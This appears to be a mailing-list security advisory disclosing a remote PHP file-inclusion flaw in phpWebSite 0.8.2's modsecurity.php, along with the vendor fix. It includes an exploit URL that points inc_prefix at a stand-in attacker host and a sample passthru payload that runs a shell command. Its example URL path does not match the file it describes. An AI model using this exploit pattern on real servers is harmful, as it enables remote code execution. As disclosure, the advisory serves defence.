--------------------------------------
| PHP source injection in phpWebSite |
--------------------------------------
 
Product Description
===================
phpWebSite is written in the PHP Programming Language,
making it ideal for developers to write customized
plug-ins. PHP is a server side programming language
that is simple, cross-platform, and fast. It can be
found at http://phpwebsite.appstate.edu
 
Tested version
==============
Stable - 0.8.2 (modsecurity.php version < 1.10)

The Problem
===========
phpWebSite commes with a file called
modsecurity.php, and looks like this:
 
-------- modsecurity.php --------
<?php
 global $inc_prefix;
 if(!$inc_prefix) {
 ...
 }
 ...
 include_once($inc_prefix."htmlheader.php");
?>
----------------------------------
 
If someone request a URL like
http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
the htmlheader.php file from MYBOX would be included,
and the attacker would be able to include any code he
wants.
 
Examples
========
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
 
--- htmlheader.php ---
<? passthru("/bin/ls") ?>
----------------------

Output: dir listing of the current dierctory

Sollution
=========
I informed the vendor and they released a new version (1.11)
of the modsecurity.php file wich is avaiable from:
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite

A new version (0.8.3) is released so this vulnerability so new users will
never have a modsecurity.php file older then version 1.11

------------------------------
Tim Vandermeersch
Tim.Vandermeerschpandora.be
http://users.pandora.be/tim/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]